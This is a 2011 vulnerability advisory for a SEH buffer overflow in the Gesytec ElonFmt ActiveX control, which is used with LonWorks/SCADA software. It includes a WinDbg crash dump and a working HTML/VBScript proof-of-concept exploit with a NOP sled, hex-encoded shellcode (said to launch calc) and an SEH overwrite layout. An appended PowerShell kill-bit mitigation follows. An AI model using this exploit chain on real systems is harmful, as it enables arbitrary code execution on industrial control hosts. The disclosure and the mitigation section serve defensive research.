<!--
Gesytec ElonFmt ActiveX 1.1.14 (ElonFmt.ocx) pid Item Buffer Overflow (SEH)
Vendor: Gesytec GmbH
Product web page: http://www.gesytec.de
Affected version: 1.1.14.1
Summary: Connects LonWorks networks to process control, visualization, SCADA
and office software.
Desc: The ElonFmt ActiveX Control Module suffers from a buffer overflow
vulnerability. When a large buffer is passed as the pid argument of the GetItem1
function in the elonfmt.ocx module, several registers are overwritten, including
the SEH handler. The input goes through a character translation before the copy
(in the dump below the supplied 'A', 'B', 'C' and 'D' characters arrive in memory
as 0xAA, 0xBB, 0xCC and 0xDD bytes). An attacker can gain access to the system on
the affected node and execute arbitrary code.
----------------------------------------------------------------------------------
(fc.1608): Access violation - code c0000005 (first chance)
First chance exceptions are reported before any exception handling.
This exception may be expected and handled.
eax=00000000 ebx=00000000 ecx=cccccccc edx=7c9032bc esi=00000000 edi=00000000
eip=cccccccc esp=0013e7d8 ebp=0013e7f8 iopl=0 nv up ei pl zr na pe nc
cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00010246
cccccccc ?? ???
0:000> !exchain
0013e7ec: ntdll!ExecuteHandler2+3a (7c9032bc)
0013ecf0: cccccccc
Invalid exception stack at bbbbbbbb
0:000> u 0013ecf0
0013ecf0 bbbbbbbbcc mov ebx,0CCBBBBBBh
0013ecf5 cc int 3
0013ecf6 cc int 3
0013ecf7 cc int 3
0013ecf8 dddd fstp st(5)
0013ecfa dddd fstp st(5)
0013ecfc dddd fstp st(5)
0013ecfe dddd fstp st(5)
...
...
...
0:000> d esp
0013eb58 01 00 00 00 8d 61 53 80-7c 5a 63 af 00 00 00 00 .....aS.|Zc.....
0013eb68 88 d5 2e ba 00 00 00 00-24 46 53 8a 00 86 8f bf ........$FS.....
0013eb78 a8 5a 63 af a8 5a 63 af-fb 0a 80 bf 60 29 53 89 .Zc..Zc.....`)S.
0013eb88 ce 86 8f bf 68 d5 2e ba-88 d5 2e ba 00 00 00 00 ....h...........
0013eb98 06 00 05 00 a1 00 00 00-2e 0e 73 74 d1 18 43 7e ..........st..C~
0013eba8 01 00 00 00 00 00 00 00-40 f7 47 00 81 18 c3 77 ........@.G....w
0013ebb8 1a 03 00 00 a2 56 00 10-00 ed 13 00 e8 eb 13 00 .....V..........
0013ebc8 20 8f 63 01 b8 8e 63 01-81 18 c3 77 01 00 00 00 .c...c....w....
0:000> d
0013ebd8 64 21 12 77 ff 00 00 00-74 e1 97 7c 51 7c 91 7c d!.w....t..|Q|.|
0013ebe8 aa aa aa aa aa aa aa aa-aa aa aa aa aa aa aa aa ................
0013ebf8 aa aa aa aa aa aa aa aa-aa aa aa aa aa aa aa aa ................
0013ec08 aa aa aa aa aa aa aa aa-aa aa aa aa aa aa aa aa ................
0013ec18 aa aa aa aa aa aa aa aa-aa aa aa aa aa aa aa aa ................
0013ec28 aa aa aa aa aa aa aa aa-aa aa aa aa aa aa aa aa ................
0013ec38 aa aa aa aa aa aa aa aa-aa aa aa aa aa aa aa aa ................
0013ec48 aa aa aa aa aa aa aa aa-aa aa aa aa aa aa aa aa ................
...
...
...
0:000> d
0013ece8 aa aa aa aa aa aa aa aa-bb bb bb bb cc cc cc cc ................
0013ecf8 dd dd dd dd dd dd dd dd-dd ad d0 01 01 00 63 01 ..............c.
0013ed08 00 00 00 00 b8 8e 63 01-01 00 00 00 00 ed 13 00 ......c.........
0013ed18 82 a5 00 10 8c ed 13 00-b8 8e 63 01 28 ee 13 00 ..........c.(...
0013ed28 00 00 00 00 80 02 63 01-80 ed 13 00 ae 43 dd 73 ......c......C.s
0013ed38 5c ed 13 00 d8 f0 00 10-02 00 00 00 d9 a3 00 10 \...............
0013ed48 80 02 63 01 24 8e 56 01-01 00 00 00 78 8e 63 01 ..c.$.V.....x.c.
0013ed58 48 ed 13 00 80 ed 13 00-98 f0 00 10 01 00 00 00 H...............
----------------------------------------------------------------------------------
Tested on: Microsoft Windows XP Professional SP3 (EN)
Easylon OPC Server M 2.30.66.0
Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
liquidworm gmail com
Zero Science Lab - http://www.zeroscience.mk
High five to sickn3ss!
Advisory ID: ZSL-2011-5011
Advisory URL: http://www.zeroscience.mk/en/vulnerabilities/ZSL-2011-5011.php
09.04.2011
JUST A PoC MODEL:
--><html>
<body><object classid="clsid:824C4DC5-8DA4-11D6-A01F-00E098177CDC" id="zsl"></object>
<script language="VBScript">
targetFile = "C:\Easylon\Shared\ElonFmt.ocx"
prototype = "Function GetItem1 ( ByVal typeName As String , ByVal pid As String , ByVal selector As Integer ) As Object"
memberName = "GetItem1"
progid = "ELONFMTLib.ElonFmt"
argCount = 3
arg1="defaultV"
arg2 = String(10, "90") _
+ "2bc9b88bc18865b132ddc3d97424f45d31450e03" _
+ "450e834ec56a90ac2ee35b4caf94d2a99e8681ba" _
+ "b316c1ee3fdc871acb900f2d7c1e76007daeb6ce" _
+ "bdb04a0c921272dfe753b33d07016c4abab6190e" _
+ "07b6cd0537c068d9cc7a72097cf03cb1f65e9dc0" _
+ "dbbce18b5076910ab1465a3dfd0565f2f054a134" _
+ "eb22d94796341a3a4cb0bf9c0762641dcbf5ef11" _
+ "a072b7353756c341bc5904c0867d80895d1f9177" _
+ "3320c1dfec8489cdf9bfd39bfc326ee2ff4c7144" _
+ "687cfa0bef8129681fc870d88895e059d525df9d" _
+ "e0a5ea5d17b59e5853717210cc147487ed3c1746" _
+ "7edcd8" _
+ String(62, "A") + "eb069090" + "78c70110" _
+ "e9e0fdffff" + String(20, "D")
arg3=1
zsl.GetItem1 arg1 ,arg2 ,arg3
'
'Argument No.2 Structure:
'--------------------------------------------------------------------------------------------------------------
'
' (20)NOPSLED + (446)SCODE(calc) + (62)JUNK + (8)JMP + (8)P/P/R EDI LDRF32R.dll + (10)JMP BCk + (20)JUNK
'
'--------------------------------------------------------------------------------------------------------------
'
'
'
'Scenes (2/5)
'--------------------------------------------------------------------------------------------------------------
'
'arg2 = String(528, "A") + "BBBBBBBB" + "CCCCCCCC" + "DDDDDDDD" + "41414141"
'
' junk nseh seh(eip) pad eip
'
'--------------------------------------------------------------------------------------------------------------
'
'arg2 = String(528, "A") + "BBBBBBBB" + "CCCCCCCC" + String(101, "D")
'
' junk nseh seh(eip) random
'
'--------------------------------------------------------------------------------------------------------------
'
</script>
</body></html>
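A mitigation for the control described in this advisory, as an added example that is not part of the original advisory or of Gesytec's software: the script sets the Internet Explorer kill bit (Compatibility Flags 0x400) for the ElonFmt CLSID taken from the PoC's object tag, so the browser refuses to instantiate the control, and then verifies the result. It assumes an elevated PowerShell prompt and that the path and value name are the standard ActiveX Compatibility registry location.

```powershell
# Added example (not from the advisory): set the IE kill bit for the ElonFmt control.
# The CLSID comes from the <object> tag in the PoC above; run from an elevated prompt.
$clsid   = '{824C4DC5-8DA4-11D6-A01F-00E098177CDC}'
$killBit = 0x400   # COMPAT_EVIL_DONT_LOAD; flags are OR-ed, so existing bits are preserved

# On 64-bit Windows the 32-bit IE reads the Wow6432Node view, so cover both hives.
$paths = @("HKLM:\SOFTWARE\Microsoft\Internet Explorer\ActiveX Compatibility\$clsid")
if ([Environment]::Is64BitOperatingSystem) {
    $paths += "HKLM:\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\ActiveX Compatibility\$clsid"
}

# Informational check: is the control registered on this host at all?
$registered = Test-Path "Registry::HKEY_CLASSES_ROOT\CLSID\$clsid"
Write-Output ("ElonFmt control registered under HKCR\CLSID: {0}" -f $registered)

foreach ($path in $paths) {
    if (-not (Test-Path $path)) { New-Item -Path $path -Force | Out-Null }
    $current = (Get-ItemProperty -Path $path -Name 'Compatibility Flags' `
                -ErrorAction SilentlyContinue).'Compatibility Flags'
    if ($null -eq $current) { $current = 0 }
    Set-ItemProperty -Path $path -Name 'Compatibility Flags' `
                     -Value ($current -bor $killBit) -Type DWord
}

# Verification: read the value back and report whether the kill bit is set.
foreach ($path in $paths) {
    $flags = (Get-ItemProperty -Path $path -Name 'Compatibility Flags').'Compatibility Flags'
    $isSet = (($flags -band $killBit) -ne 0)
    Write-Output ("{0}`n  Compatibility Flags = 0x{1:X}  KillBitSet = {2}" -f $path, $flags, $isSet)
}
```

The kill bit only blocks instantiation through Internet Explorer and other hosts that honour it; unregistering the control (regsvr32 /u on ElonFmt.ocx) or applying a vendor fix is needed to remove the vulnerable code from the host entirely.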